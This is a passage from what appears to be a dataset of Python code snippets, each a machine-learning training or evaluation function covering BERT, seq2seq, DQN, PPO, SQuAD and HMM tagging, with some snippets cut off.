it-self\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\ttorch.save(model_to_save.state_dict(), 
output_model_file)\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\twith open(output_config_file, 'w') as f:\n\t\t\tf.write(model_to_save.config.to_json_string())\n\t\tlabel_map = {i : label for i, label in enumerate(label_list,1)} \n\t\tmodel_config = {\"bert_model\":\"bert-base-uncased\",\"do_lower\":True,\"max_seq_length\":MAX_SEQ_LENGTH,\"num_labels\":num_labels,\"label_map\":label_map}\n\t\tjson.dump(model_config,open(os.path.join(OUTPUT_DIR,\"model_config.json\"),\"w\"))\n\n\telse:\n\t\toutput_config_file = os.path.join(OUTPUT_DIR, CONFIG_NAME)\n\t\toutput_model_file = os.path.join(OUTPUT_DIR, WEIGHTS_NAME)\n\t\tconfig = BertConfig(output_config_file)\n\t\tmodel = BertForSequenceClassification(config, num_labels=num_labels)\n\t\tmodel.load_state_dict(torch.load(output_model_file))\n\n\tmodel.to(device)\n\n\tif do_eval:\n\n\t\tEVAL_BATCH_SIZE = 32\n\n\t\teval_examples = [InputExample(guid=None,text_a=sentence,text_b=None,label=label) for sentence,label in zip(test_sents, test_labels)]\n\t\tnum_eval_examples = len(eval_examples)\n\n\t\teval_features = convert_examples_to_features(\n\t\t\teval_examples, label_list, MAX_SEQ_LENGTH, tokenizer)\n\n\t\tlogger.info(\"***** Running evaluation *****\")\n\t\tlogger.info(\" Num examples = %d\", num_eval_examples)\n\t\tlogger.info(\" Batch size = %d\", EVAL_BATCH_SIZE)\n\t\tall_input_ids = torch.tensor([f.input_ids for f in eval_features], dtype=torch.long)\n\t\tall_input_mask = torch.tensor([f.input_mask for f in eval_features], dtype=torch.long)\n\t\tall_segment_ids = torch.tensor([f.segment_ids for f in eval_features], dtype=torch.long)\n\t\tall_label_ids = torch.tensor([f.label_id for f in eval_features], dtype=torch.long)\n\t\teval_data = TensorDataset(all_input_ids, all_input_mask, all_segment_ids, all_label_ids) \n\t\t# # Run prediction for full data\n\t\teval_sampler = SequentialSampler(eval_data)\n\t\teval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=EVAL_BATCH_SIZE)\n\t\tmodel.eval()\n\n\t\teval_loss, eval_accuracy = 0, 0\n\t\tnb_eval_steps, nb_eval_examples = 0, 0\n\t\ty_true = []\n\t\ty_pred = []\n\t\tlabel_map = {i : label for i, label in enumerate(label_list,1)}\n\t\tfor input_ids, input_mask, segment_ids, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"):\n\t\t\tinput_ids = input_ids.to(device)\n\t\t\tinput_mask = input_mask.to(device)\n\t\t\tsegment_ids = segment_ids.to(device)\n\t\t\tlabel_ids = label_ids.to(device)\n\n\t\t\twith torch.no_grad():\n\t\t\t\tlogits = model(input_ids, segment_ids, input_mask)\n\t\t\t\t\n\t\t\tlogits = torch.argmax(F.log_softmax(logits,dim=1),dim=1)\n\t\t\tlogits = logits.detach().cpu().numpy()\n\t\t\tlabel_ids = label_ids.to('cpu').numpy()\n\t\t\ty_pred.extend(logits)\n\t\t\ty_true.extend(label_ids)\n\t\tprint(len(y_pred))\n\t\tprint(len(y_true))\n\t\treport = classification_report(y_true, y_pred)\n\t\toutput_eval_file = os.path.join(OUTPUT_DIR, \"eval_results.txt\")\n\t\twith open(output_eval_file, \"w\") as writer:\n\t\t\tlogger.info(\"***** Eval results *****\")\n\t\t\tlogger.info(\"\\n%s\", report)\n\t\t\twriter.write(report)", "def evaluate(self, model, data, vocabs=None, use_concept=False, log_dir=None, embed=None, cur_step=0):\n\n\n eval_limit = 5000\n step_limit = int(eval_limit / self.batch_size)\n\n model.eval()\n\n loss = self.loss\n loss.reset()\n match = 0\n total = 0\n\n device = torch.device('cuda', 0) if torch.cuda.is_available() else None\n batch_iterator = torchtext.data.BucketIterator(\n dataset=data, batch_size=self.batch_size,\n 
sort=True, sort_key=lambda x: len(x.src),\n device=device, train=False)\n tgt_vocab = data.fields[seq2seq.tgt_field_name].vocab\n src_vocab = data.fields[seq2seq.src_field_name].vocab\n pad = tgt_vocab.stoi[data.fields[seq2seq.tgt_field_name].pad_token]\n\n cnt = 0\n loss_sum = 0\n\n context_corpus = []\n reference_corpus = []\n prediction_corpus = []\n with torch.no_grad():\n for batch in batch_iterator:\n cnt += 1\n input_variables, input_lengths = getattr(batch, seq2seq.src_field_name)\n\n if torch.cuda.is_available():\n input_index = input_variables.cpu().numpy()\n else:\n input_index = input_variables.numpy()\n input_words = [[src_vocab.itos[word] for word in line] for line in input_index]\n context_corpus.extend(input_words)\n\n if use_concept:\n concept, _ = getattr(batch, seq2seq.cpt_field_name)\n else:\n concept = []\n target_variables = getattr(batch, seq2seq.tgt_field_name)\n\n decoder_outputs, decoder_hidden, other = model(input_variables, input_lengths.tolist(), target_variables,\n concept=concept, vocabs=vocabs, use_concept=use_concept)\n # Evaluation\n seqlist = other['sequence']\n reference = []\n prediction = []\n for step, step_output in enumerate(decoder_outputs):\n target = target_variables[:, step + 1]\n loss.eval_batch(step_output.view(target_variables.size(0), -1), target)\n non_padding = target.ne(pad)\n correct = seqlist[step].view(-1).eq(target).masked_select(non_padding).sum().item()\n match += correct\n total += non_padding.sum().item()\n if torch.cuda.is_available():\n pred = seqlist[step].view(-1).cpu().numpy()\n tgt = target.view(-1).cpu().numpy()\n else:\n pred = seqlist[step].view(-1).numpy()\n tgt = target.view(-1).numpy()\n for i in range(len(step_output)):\n target_char = tgt_vocab.itos[tgt[i]]\n pred_char = tgt_vocab.itos[pred[i]]\n if target_char != '<pad>':\n if len(reference) >= i + 1:\n reference[i].append(target_char)\n else:\n reference.append([target_char])\n if pred_char != '<pad>':\n if len(prediction) >= i + 1:\n prediction[i].append(pred_char)\n else:\n prediction.append([pred_char])\n for i in range(len(reference)):\n reference[i] = reference[i][1:]\n prediction[i] = prediction[i][1:]\n reference_corpus.extend([[line] for line in reference])\n prediction_corpus.extend(prediction)\n if cnt > step_limit:\n break\n\n print(\"Corpus BLEU: \", corpus_bleu(reference_corpus, prediction_corpus, smoothing_function=smoothie))\n print(\"Embedding dist: \", embed.eval_embedding(reference_corpus, prediction_corpus))\n print(\"Distinct-1: \", distinct(prediction_corpus, 1))\n print(\"Distinct-2: \", distinct(prediction_corpus, 2))\n\n with open(log_dir + '/log-' + str(cur_step), 'w', encoding='utf-8') as file:\n for i in range(len(reference_corpus)):\n file.write(\"Context: \" + ' '.join(context_corpus[i]) + '\\n')\n file.write(\"Gold: \" + ' '.join(prediction_corpus[i]) + '\\n')\n file.write(\"Response: \" + ' '.join(reference_corpus[i][0]) + '\\n')\n file.write('\\n')\n if total == 0:\n accuracy = float('nan')\n else:\n accuracy = match / total\n\n return loss.get_loss(), accuracy", "def train(net, train_iterator, dev_iterator, vocabs, epoch_num=4, lr=0.002):\n net.train()\n\n criterion = nn.CrossEntropyLoss()\n\n parameters = filter(lambda p: p.requires_grad, net.parameters())\n optimizer = optim.Adamax(parameters, lr=lr)\n\n # Training loop\n for epoch in tqdm(range(epoch_num), total=epoch_num, desc=\"Epoch\"):\n epoch_loss = 0\n # Epoch loop\n for i, batch in tqdm(enumerate(train_iterator), total=len(train_iterator), desc=\"Iteration\"):\n 
net.train()\n if _DEBUG:\n q = totext(batch.question[0],vocabs[0],batch_first=False)\n d = totext(batch.document[0],vocabs[0],batch_first=False)\n a1 = totext(batch.answer1[0],vocabs[0],batch_first=False)\n a2 = totext(batch.answer2[0],vocabs[0],batch_first=False)\n print(\"* \"*20+\"NEXT\"+\"* \"*20)\n print(d[0])\n print(\"* \" * 20 + \"Question\" + \"* \" * 20)\n print(q[0])\n print(\"* \" * 20 + \"Answers\" + \"* \" * 20)\n print(a1[0])\n print(a2[0])\n\n optimizer.zero_grad()\n out = net(batch)\n loss = criterion(out, batch.correct)\n loss.backward()\n tut.clip_grad_norm_(parameters, 0.5)\n optimizer.step()\n epoch_loss += loss.item()\n\n # At the end of an epoch, evaluate the current performance on the development set\n with torch.no_grad():\n net.eval()\n dev_loss = 0\n j = 0\n correct = 0\n total = 0\n for j, val_batch in enumerate(dev_iterator):\n out = net(val_batch)\n total += val_batch.correct.size(0)\n loss = criterion(out, val_batch.correct)\n dev_loss += loss.item()\n _, pred_indexes = torch.max(out.data, 1)\n correct += (pred_indexes == val_batch.correct).sum().item()\n print('Epoch: {0}, Train loss: {1}, Dev loss: {2}, Dev accuracy: {3}%'.format(\n epoch, epoch_loss/len(train_iterator), dev_loss/(j+1), correct*100/total))", "def train(self):\n tic = time.time()\n means = []\n stds = []\n steps = 0\n scores_window = deque(maxlen=100)\n for e in range(1,self.episodes):\n\n self.noise.step()\n episode_scores = []\n obs = self.env.reset()\n for t in range(self.tmax):\n actions = self.act(obs)\n next_obs,rewards,dones = self.env.step(actions)\n\n # Store experience\n if np.max(rewards) > 0:\n print('hit the ball over the net',rewards)\n self.R.add(obs.reshape(1,48),obs,actions,rewards,next_obs.reshape(1,48),next_obs,dones)\n obs = next_obs\n # Score tracking\n episode_scores.append(np.max(rewards))\n \n # Learn\n if len(self.R) > self.min_buffer_size:\n for _ in range(self.SGD_epoch):\n # Update each agent\n for i in range(self.num_agents):\n self.learn(i)\n # update target networks\n self.update_targets_all()\n \n steps += int(t)\n means.append(np.mean(episode_scores))\n stds.append(np.std(episode_scores))\n scores_window.append(np.sum(episode_scores))\n if e % 4 == 0:\n toc = time.time()\n r_mean = np.mean(scores_window)\n r_max = max(scores_window)\n r_min = min(scores_window)\n r_std = np.std(scores_window)\n plot(self.name,means,stds)\n print(\"\\rEpisode: {} out of {}, Steps {}, Rewards: mean {:.2f}, min {:.2f}, max {:.2f}, std {:.2f}, Elapsed {:.2f}\".format(e,self.episodes,steps,r_mean,r_min,r_max,r_std,(toc-tic)/60))\n if np.mean(scores_window) > self.winning_condition:\n print('Env solved!')\n # save scores\n pickle.dump([means,stds], open(str(self.name)+'_scores.p', 'wb'))\n # save policy\n self.save_weights(self.critic_path,self.actor_path)\n break", "def run(self):\n def update_logs(summary_writer, episode, reward, loss, epsilon):\n summary_writer.add_scalar('Reward', reward, episode)\n summary_writer.add_scalar('Loss', loss, episode)\n summary_writer.add_scalar('Epsilon', epsilon, episode)\n \n # Print model and init summary_writer\n summary(self.policy_net, (1, self.num_inputs))\n summary_writer = SummaryWriter(log_dir=f'./logs/{self.name}/')\n\n sum_reward = 0\n\n # Run nb_games\n for n in range(self.nb_games):\n\n reward, loss = self._run_one_game()\n\n # Update values and logs\n episode = self.nb_iter_prev + n\n sum_reward += reward\n self.epsilon = max(self.min_epsilon, self.epsilon * self.decay)\n update_logs(summary_writer, episode, reward, loss, 
self.epsilon)\n \n # Each update_frequency print and update target_net\n if (episode + 1) % self.update_frequency == 0:\n print(f'Episode: {episode + 1}, Epsilon: {self.epsilon}, '\n f'Reward: {reward}, Loss: {loss}, '\n f'Mean reward: {sum_reward/self.update_frequency}.')\n sum_reward = 0\n self._update_target_net()\n\n # End of the training\n self.nb_iter_prev += self.nb_games\n self.save()", "def _run(self):\n if not self.is_train:\n return self.test() \n\n logger.debug(\"Actor {} resuming at Step {}, {}\".format(self.actor_id, \n self.global_step.value(), time.ctime()))\n\n s = self.emulator.get_initial_state()\n \n s_batch = []\n a_batch = []\n y_batch = []\n bonuses = deque(maxlen=100)\n\n exec_update_target = False\n total_episode_reward = 0\n episode_ave_max_q = 0\n episode_over = False\n qmax_down = 0\n qmax_up = 0\n prev_qmax = -10*6\n low_qmax = 0\n ep_t = 0\n \n while (self.global_step.value() < self.max_global_steps):\n # Sync local learning net with shared mem\n self.sync_net_with_shared_memory(self.local_network, self.learning_vars)\n self.save_vars()\n\n rewards = []\n states = []\n actions = []\n local_step_start = self.local_step\n \n while not episode_over:\n logger.debug('steps: {} / {}'.format(self.global_step.value(), self.max_global_steps))\n # Choose next action and execute it\n a, readout_t = self.choose_next_action(s)\n\n new_s, reward, episode_over = self.emulator.next(a)\n total_episode_reward += reward\n\n current_frame = new_s[...,-1]\n bonus = self.density_model.update(current_frame)\n bonuses.append(bonus)\n\n if (self.actor_id == 0) and (self.local_step % 200 == 0):\n bonus_array = np.array(bonuses)\n logger.debug('Mean Bonus={:.4f} / Max Bonus={:.4f}'.format(\n bonus_array.mean(), bonus_array.max()))\n\n # Rescale or clip immediate reward\n # reward = self.rescale_reward(reward + bonus)\n reward = self.rescale_reward(reward)\n ep_t += 1\n \n rewards.append(reward)\n states.append(s)\n actions.append(a)\n \n s = new_s\n self.local_step += 1\n episode_ave_max_q += np.max(readout_t)\n \n global_step, update_target = self.global_step.increment(\n self.q_target_update_steps)\n\n if update_target:\n update_target = False\n exec_update_target = True\n\n if self.local_step % 4 == 0:\n self.batch_update()\n \n self.local_network.global_step = global_step\n\n else:\n mc_returns = list()\n running_total = 0.0\n for r in reversed(rewards):\n running_total = r + self.gamma*running_total\n mc_returns.insert(0, running_total)\n\n mixed_returns = self.cts_eta*np.array(rewards) + (1-self.cts_eta)*np.array(mc_returns)\n\n states.append(new_s)\n episode_length = len(rewards)\n for i in range(episode_length):\n self.replay_memory.append((\n states[i],\n actions[i],\n mixed_returns[i],\n states[i+1],\n i+1 == episode_length))\n\n \n if exec_update_target:\n self.update_target()\n exec_update_target = False\n # Sync local tensorflow target network params with shared target network params\n if self.target_update_flags.updated[self.actor_id] == 1:\n self.sync_net_with_shared_memory(self.target_network, self.target_vars)\n self.target_update_flags.updated[self.actor_id] = 0\n\n s, total_episode_reward, _, ep_t, episode_ave_max_q, episode_over = \\\n self.prepare_state(s, total_episode_reward, self.local_step, ep_t, episode_ave_max_q, episode_over)", "def evaluate():\n log.info('Loading dev data...')\n if args.version_2:\n dev_data = SQuAD('dev', version='2.0')\n else:\n dev_data = SQuAD('dev', version='1.1')\n (_, _), (data_file_name, _) \\\n = 
dev_data._data_file[dev_data._version][dev_data._segment]\n dev_data_path = os.path.join(dev_data._root, data_file_name)\n\n if args.debug:\n sampled_data = [dev_data[0], dev_data[1], dev_data[2]]\n dev_data = mx.gluon.data.SimpleDataset(sampled_data)\n log.info('Number of records in dev data: %d', len(dev_data))\n\n dev_data_features = preprocess_dataset(\n tokenizer, dev_data, vocab=vocab, max_seq_length=args.max_seq_length,\n doc_stride=args.doc_stride, num_workers=args.num_workers,\n max_query_length=args.max_query_length, load_from_pickle=args.load_pickle,\n feature_file=args.dev_dataset_file)\n\n dev_data_input = convert_full_features_to_input_features(dev_data_features)\n log.info('The number of examples after preprocessing: %d', len(dev_data_input))\n\n dev_dataloader = mx.gluon.data.DataLoader(dev_data_input, batchify_fn=batchify_fn,\n num_workers=4, batch_size=args.test_batch_size,\n shuffle=False, last_batch='keep')\n\n log.info('start prediction')\n\n all_results = collections.defaultdict(list)\n\n epoch_tic = time.time()\n total_num = 0\n for (batch_id, data) in enumerate(dev_dataloader):\n data_list = list(split_and_load(data, ctx))\n for splited_data in data_list:\n example_ids, inputs, token_types, valid_length, p_mask, _, _, _ = splited_data\n total_num += len(inputs)\n outputs = net_eval(inputs, token_types, valid_length, p_mask=p_mask)\n example_ids = example_ids.asnumpy().tolist()\n for c, example_ids in enumerate(example_ids):\n result = RawResultExtended(start_top_log_probs=outputs[0][c].asnumpy().tolist(),\n start_top_index=outputs[1][c].asnumpy().tolist(),\n end_top_log_probs=outputs[2][c].asnumpy().tolist(),\n end_top_index=outputs[3][c].asnumpy().tolist(),\n cls_logits=outputs[4][c].asnumpy().tolist())\n all_results[example_ids].append(result)\n if batch_id % args.log_interval == 0:\n log.info('Batch: %d/%d', batch_id + 1, len(dev_dataloader))\n\n epoch_toc = time.time()\n log.info('Time cost=%2f s, Thoughput=%.2f samples/s', epoch_toc - epoch_tic,\n total_num / (epoch_toc - epoch_tic))\n\n log.info('Get prediction results...')\n\n all_predictions = collections.OrderedDict()\n all_nbest_json = collections.OrderedDict()\n scores_diff_json = collections.OrderedDict()\n for features in dev_data_features:\n results = all_results[features[0].example_id]\n example_qas_id = features[0].qas_id\n score_diff, best_non_null_entry, nbest_json = predict_extended(\n features=features, results=results, n_best_size=args.n_best_size,\n max_answer_length=args.max_answer_length, start_n_top=args.start_top_n,\n end_n_top=args.end_top_n)\n scores_diff_json[example_qas_id] = score_diff\n all_predictions[example_qas_id] = best_non_null_entry\n all_nbest_json[example_qas_id] = nbest_json\n\n output_prediction_file = os.path.join(args.output_dir, 'predictions.json')\n output_nbest_file = os.path.join(args.output_dir, 'nbest_predictions.json')\n output_null_log_odds_file = os.path.join(args.output_dir, 'null_odds.json')\n\n with open(output_prediction_file, 'w') as writer:\n writer.write(json.dumps(all_predictions, indent=4) + '\\n')\n with open(output_nbest_file, 'w') as writer:\n writer.write(json.dumps(all_nbest_json, indent=4) + '\\n')\n with open(output_null_log_odds_file, 'w') as writer:\n writer.write(json.dumps(scores_diff_json, indent=4) + '\\n')\n\n if os.path.exists(sys.path[0] + '/evaluate-v2.0.py'):\n arguments = [\n dev_data_path, output_prediction_file, '--na-prob-thresh',\n str(args.null_score_diff_threshold)\n ]\n if args.version_2:\n arguments += ['--na-prob-file', 
output_null_log_odds_file]\n subprocess.call([sys.executable, sys.path[0] + '/evaluate-v2.0.py'] + arguments)\n else:\n log.info('Please download evaluate-v2.0.py to get evaluation results for SQuAD. '\n 'Check index.rst for the detail.')", "def train(args: Dict):\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n print('use device: %s' % device)\n\n train_data_src = read_corpus(args['--train-src'], source='src')\n train_data_tgt = read_corpus(args['--train-tgt'], source='tgt')\n\n dev_data_src = read_corpus(args['--dev-src'], source='src')\n dev_data_tgt = read_corpus(args['--dev-tgt'], source='tgt')\n\n train_data = list(zip(train_data_src, train_data_tgt))\n dev_data = list(zip(dev_data_src, dev_data_tgt))\n\n train_batch_size = int(args['--batch-size'])\n N = int(args['--N'])\n d_model = int(args['--d_model'])\n d_ff = int(args['--d_ff'])\n h = int(args['--h'])\n dropout = float(args['--dropout'])\n\n valid_niter = int(args['--valid-niter'])\n log_every = int(args['--log-every'])\n model_save_path = args['--save-to']\n lr=float(args['--lr'])\n\n vocab = Vocab.load(args['--vocab'])\n vocab_mask = torch.ones(len(vocab.tgt))\n vocab_mask[vocab.tgt['<pad>']] = 0\n\n model = make_model(len(vocab.src), len(vocab.tgt), N, d_model, d_ff, h, dropout)\n model = model.to(device)\n\n optimizer = NoamOpt(model.src_embed[0].d_model, 1, 400,\n torch.optim.Adam(model.parameters(), lr=lr, betas=(0.9, 0.98), eps=1e-9))\n\n num_trial = 0\n train_iter = patience = cum_loss = report_loss = cum_tgt_words = report_tgt_words = 0\n cum_exmaples = report_examples = epoch = valid_num = 0\n hist_valid_scores = []\n train_time = begin_time = time.time()\n print('begin Maximum Likelihood Training')\n\n while True:\n epoch += 1\n for src_sents, tgt_sents in batch_iter(train_data, batch_size=train_batch_size, shuffle=True):\n train_iter += 1\n optimizer.zero_grad()\n batch_size = len(src_sents)\n\n example_losses = - model(src_sents, tgt_sents) #(batch_size,)\n batch_loss = example_losses.sum()", "def run_step(self):\n self.hooked_sess.run(self.train_op)", "def run_training(self):\n while not rospy.is_shutdown():\n\n # 1. collect rollouts\n # see subscriber callback function: retrieve_rollout()\n\n # 2. 
Check buffer size and update policy\n            if len(self.buffer) >= self.batch_size:\n                # Toggle state and destroy subscriber\n                self.toggleState()\n                self.unsubscribe()\n                time.sleep(1.0)\n                # Update policy weights with PPO algorithm\n                self.run_optimization()\n                self.buffer.flush()\n                time.sleep(1.0)\n                # Toggle state and initialize subscriber\n                self.initialize_subscriber()\n                time.sleep(1.0)\n                self.toggleState()\n                # Evaluate current policy\n                self.evaluate_policy()", "def trainAgent(self):\r\n\t\tfor episode in range(self.TOT_EPISODES):\r\n\t\t\t#reset environment, stacked frames every episode.\r\n\t\t\tstate = self.env.reset()\r\n\t\t\trewards = 0\r\n\t\t\t#preprocess and stack the frame/state.\r\n\t\t\tstate, self.stacked_frames = stack_frames(self.stack_size,\r\n\t\t\t\t\t\t\t\t\tself.stacked_frames, state, True)\r\n\t\t\t\r\n\t\t\tfor step in range(self.MAX_STEPS):\r\n\t\t\t#for every step in episode:\r\n\t\t\t\r\n\t\t\t\tif (step%100==0):\r\n\t\t\t\t\tprint(\"Episode No.: \", episode, \"Step No.: \", step)\r\n\t\t\t\t\r\n\t\t\t\t#agent acts - explores or exploits the model\r\n\t\t\t\taction = self.dqn.predictAction(state)\r\n\t\t\t\t#reduce epsilon for more exploitation later.\r\n\t\t\t\tself.dqn.decayEpsilon()\r\n\t\t\t\t#Perform the action and get the next_state, reward, and done vals.\r\n\t\t\t\tnext_state, reward, done, _ = self.env.step(action)\r\n\t\t\t\t#append this state to the frame. Pass the previous stacked frame.\r\n\t\t\t\tnext_state, self.stacked_frames = stack_frames(self.stack_size,\r\n\t\t\t\t\t\t\t\t\t\tself.stacked_frames, next_state, False)\r\n\t\t\t\trewards+=reward\r\n\t\t\t\t\r\n\t\t\t\t#add this experience into memory (experience buffer)\r\n\t\t\t\tself.dqn.remember(state, action, reward, next_state, done)\r\n\t\t\t\t\r\n\t\t\t\tstate = next_state\r\n\t\t\t\t\r\n\t\t\t\tif done:\r\n\t\t\t\t\tprint(\"took %d steps\" %step)\r\n\t\t\t\t\tprint(\"Earned a total of reward equal to \", rewards)\r\n\t\t\t\t\tbreak\r\n\t\t\t\r\n\t\t\t\t# TRAIN\r\n\t\t\t\tself.dqn.replay()\r\n\t\t\t\t#sync target_model and model weights every 10k steps.\r\n\t\t\t\tif step % 10000 == 9999:\r\n\t\t\t\t\tself.dqn.target_train()\r\n\t\t\t\r\n\t\t\t# Save the network every 5 episodes\r\n\t\t\tif episode % 5 == 4:\r\n\t\t\t\tprint(\"Saving Network\")\r\n\t\t\t\tself.dqn.save_network(self.path)", "def fit(self, env, num_iteration, do_train=False):\n\n        #s, a, r, new_s, d = get_multi_step_sample(one_step_memory, self.gamma, self.num_step)\n        #self.replay_memory.append((s, a, r, new_s, d))\n        # epsilon update\n        num_env = env.num_process\n        env.reset()\n\n        for t in range(0, num_iteration, num_env):\n            self.global_step += 1\n            #print(\"Global_step: {}\".format(self.global_step))\n            old_state, action, reward, new_state, is_terminal = self.get_multi_step_sample(env)\n            self.replay_memory.append(old_state, action, reward, new_state, is_terminal)\n\n            \"\"\"\n            Epsilon update\n            epsilon begin 1.0, end up 0.1\n            FIX\n            \"\"\"\n\n            self.epsilon = self.epsilon+ num_env*self.epsilon_increment if self.epsilon > EPSILON_END else EPSILON_END\n            num_update = sum([1 if i%self.update_freq == 0 else 0 for i in range(t, t+num_env)])\n            if do_train:\n                for _ in range(num_update):\n\n                    if self.per == 1:\n                        (old_state_list, action_list, reward_list, new_state_list, is_terminal_list), \\\n                        idx_list, p_list, sum_p, count = self.replay_memory.sample(self.batch_size)\n                    else:\n                        old_state_list, action_list, reward_list, new_state_list, is_terminal_list \\\n                        = self.replay_memory.sample(self.batch_size)\n\n                    feed_dict = {self.target_s: 
new_state_list.astype(np.float32)/255. ,\n self.s : old_state_list.astype(np.float32)/255.,\n self.a_ph: list(enumerate(action_list)),\n self.r_ph: np.array(reward_list).astype(np.float32),\n self.d_ph: np.array(is_terminal_list).astype(np.float32),\n }\n\n if self.double:\n action_chosen_by_online = self.sess.run(self.a,\n feed_dict={\n self.s: new_state_list.astype(np.float32)/255.})\n feed_dict[self.a_for_new_state_ph] = list(enumerate(action_chosen_by_online))\n\n if self.per == 1:\n # Annealing weight beta\n feed_dict[self.loss_weight_ph] = (np.array(p_list) * count / sum_p) ** (-self.beta)\n error, _ = self.sess.run([self.error_op, self.train_op], feed_dict=feed_dict)\n self.replay_memory.update(idx_list, error)\n\n else:\n self.sess.run(self.train_op, feed_dict=feed_dict)\n\n self.update_time += 1\n\n if self.beta < BETA_END:\n self.beta += self.beta_increment\n\n if (self.update_time)%self.target_update_freq == 0 :\n #print(\"Step: {} \".format(self.update_time) + \"target_network update\")\n self.sess.run([self.target_update])\n #print(\"Step: {} \".format(self.update_freq) + \"Network save\")\n self.save_model()", "def _run_epoch(sess, model, args, data, index=0, tb_summaries=None,\n id_to_word=None, train_op=None, verbose=False):\n epoch_start_time = time.time()\n # total cost and number of words evaluated in this epoch\n costs, total_words = 0.0, 0.0\n # epoch size is number of batches in each epoch\n epoch_size = (len(data[index]) - 1) // model.config['batch_size']\n state = sess.run(model.initial_state)\n\n # iterate through batches\n for step, (x, y) in enumerate(data_reader.batch_iterator(\n data[index], model.config['batch_size'])):\n # return these parameters after running TF session\n fetches = {\n 'cost': model.cost[index],\n 'final_state': model.final_state,\n 'seq_len': model.seq_len\n }\n # only train model has optimizer operation\n if train_op is not None:\n fetches['train_op'] = train_op[index]\n\n # create dict to feed input, targets, and rnn into TF session\n feed_dict = utils.create_feed_dict(model, args, x, y, state)\n # run all parameters in fetches dict\n vals = sess.run(fetches, feed_dict)\n\n costs += vals['cost']\n # number of words evaluated\n total_words += np.sum(vals['seq_len'])\n # use perplexity to evaluate language models\n perplexity = np.exp(costs / total_words)\n\n if verbose and step % (epoch_size // 2) == 1:\n # display perplexity and top word predictions for sequence\n _display_epoch_metrics(step, epoch_size, perplexity, total_words,\n epoch_start_time, args, model, sess,\n index, feed_dict, vals, id_to_word, y)\n\n # generate sample text while training to monitor progress\n if args.display_text == 'True' and model.name == 'Train':\n generate.generate_text(sess, model, id_to_word, train_ind=index)\n\n # write TensorBoard summaries for Train/Valid\n if args.save_path != '' and model.name != 'Test':\n summary = sess.run(tb_summaries.summary_op,\n {tb_summaries.ppl_summary: perplexity})\n model.file_writer.add_summary(summary, get_or_create_global_step().eval())\n\n return perplexity", "def train(self, examples):\n # iterate over our sentences in the examples\n for sentence in examples:\n # some testing prints\n # print('---------------------------')\n # print(sentence)\n # print('---------------------------')\n # get every tuple in the sentence\n for i in range(len(sentence)):\n # seperate the word and the state\n word = sentence[i][0]\n state = sentence[i][1]\n # add our word and state to our set of all words and states\n self.vocab.add(word)\n 
self.states.add(state)\n # if we are at the first word in the sentence need to\n # increment the number of times this tag appeared first in a sentence\n if i == 0:\n self.pi[state] += 1\n # else we need to increment the number of times the\n # current tag was preceeded by the tag before it\n else:\n if sentence[i - 1][1] not in self.transitions:\n self.transitions[sentence[i - 1][1]] = Counter()\n self.transitions[sentence[i - 1][1]][state] += 1\n # now we increment the number of times the word had this tag\n if state not in self.emissions:\n self.emissions[state] = Counter()\n self.emissions[state][word] += 1\n # print(self.emissions)\n # print(self.transitions)\n # print(self.pi)\n # print('---------------------------')\n\n # now we store the counts we will need since during our iterations\n # the counts will change\n # this stores how many sentences we have\n # count(sentences)\n pi_val = sum(self.pi.values())\n # now we are going to get the counts of the tags\n # count(t_i)\n # we are using emissions because each tag occurs in it unlike\n # in transitions where the last tag is lost kind of\n for state in self.emissions.keys():\n # print(state, sum(self.emissions[state].values()))\n self.tag_count[state] = sum(self.emissions[state].values())\n # print('---------------------------')\n # now we do the probability of a sentence starting with each tag\n # count(t_i) / count(sentences)\n for state in self.pi:\n self.pi[state] /= pi_val\n # now we will calculate the probabilites that each tag proceeds the next tag\n # ie p(t_i | t_i-1) = count(t_i-1, t_i) / count(t_i-1)\n for prev_state in self.transitions:\n for state in self.transitions[prev_state]:\n # print(prev_state, state, self.transitions[prev_state][state])\n # print(prev_state, tag_count[prev_state])\n self.transitions[prev_state][state] /= self.tag_count[prev_state]\n # print(self.transitions[prev_state][state])\n # print('---------------------------')\n # and the probability of a word having the tag with laplace smoothing\n # p(w_i | t_i) = count(t_i, w_i) / count(t_i)\n for state in self.emissions:\n for word in self.emissions[state]:\n # print(state, word, self.emissions[state][word])\n # print(state, tag_count[state])\n self.emissions[state][word] = (self.emissions[state][word] + 1) / (\n self.tag_count[state] + len(self.vocab))\n # print(self.emissions[state][word])\n # print('---------------------------')\n # print(self.emissions)\n # print(self.transitions)\n # print(self.pi)\n # print('---------------------------')\n # print(len(self.vocab))\n # print(len(self.states))\n # print('---------------------------')", "def run():\n\n # Set up environment and agent\n e = Environment() # create environment (also adds some dummy traffic)\n a = e.create_agent(LearningAgent) # create agent\n e.set_primary_agent(a, enforce_deadline=False) # set agent to track\n\n # Now simulate it\n sim = Simulator(e, update_delay=0.0) # reduce update_delay to speed up simulation\n sim.run(n_trials=num_of_experiments) # press Esc or close pygame window to quit\n \n pd.Series(a.success).to_pickle('success_' + exp_id + '.pickle')\n a.Q_table.to_pickle('qtable_' + exp_id + '.pickle')\n pd.Series(a.q_delta_avg).to_pickle('convergence_' + exp_id + '.pickle')\n pd.Series(a.t_total).to_pickle('steps_' + exp_id + '.pickle')", "def main():\r\n preprocessor = DATA_PREPROCESSOR('shakespeare-corpus.txt')\r\n corpus = preprocessor.preprocess_data()\r\n plot(corpus)\r\n data, unique_vocab, word_to_idx = create_context(corpus)\r\n\r\n #train model- changed global 
